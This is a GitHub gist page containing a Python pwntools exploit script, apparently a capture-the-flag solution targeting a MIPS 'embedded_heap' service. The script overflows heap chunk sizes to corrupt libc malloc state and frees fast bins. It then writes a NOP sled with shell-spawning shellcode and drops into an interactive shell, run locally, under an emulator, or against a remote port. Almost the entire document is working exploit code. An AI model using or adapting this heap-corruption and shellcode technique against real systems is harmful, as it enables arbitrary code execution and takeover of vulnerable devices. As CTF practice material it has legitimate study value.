Skip to content

Instantly share code, notes, and snippets.

@theKidOfArcrania theKidOfArcrania/embeded.py Secret
Created Jun 13, 2019

Embed
What would you like to do?
from pwn import *
context.update(arch='mips', endian='big')
sc = shellcraft
import sys
libc_mstate = 0x66d7c
libc_fn_off = 0x7f064
def chk_size(num):
return max((num + 4 + 7) & ~7, 0x10)
def choice(ch):
p.sendlineafter('Command: ', str(ch))
def update(ind, data):
p.sendlineafter('Index: ', str(ind))
p.sendlineafter('Size: ', str(len(data)))
p.sendafter('Content: ', data)
def free(ind):
p.sendlineafter('Index: ', str(ind))
def exploit():
p.recvuntil(': ')
a = chk_size(int(p.recvuntil(' bytes', drop=True)))
p.recvuntil(': ')
b = chk_size(int(p.recvuntil(' bytes', drop=True)))
p.recvuntil(': ')
c = chk_size(int(p.recvuntil(' bytes', drop=True)))
# Overflow heap bins
choice(1)
ind = (libc_fn_off - (libc_mstate+4)) // 4 + 2
overflow = 'a' * (a - 4) + p32(ind * 8)
overflow += 'b' * (b - 4) + p32(9) + 'cccc'
update(0, overflow)
# Pwn, free the fast bins, and then write shellcode
choice(3)
free(2)
free(1)
pause()
exp = asm(sc.nop()) * ((a // 4) - 2)
exp += asm(sc.sh())
update(0, exp)
p.interactive()
def login():
global tty
tty = process('./run.sh')
tty.recvuntil('login: ')
tty.info('Got login screen')
tty.sendline('root')
tty.recvuntil('#')
tty.success('Ready!')
if __name__ == '__main__':
p = None
try:
if sys.argv[-1] == 'remote':
p = remote('localhost', 1235)
elif sys.argv[-1] == 'local':
login()
tty.sendline('/server 1235 /embedded_heap')
p = remote('localhost', 1235)
elif sys.argv[-1] == 'debug':
login()
tty.sendline('/server 1235 gdbserver 0.0.0.0:1234 /embedded_heap')
p = remote('localhost', 1235)
else:
raise ValueError('Give an option')
exploit()
except:
if p: p.interactive()
raise
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.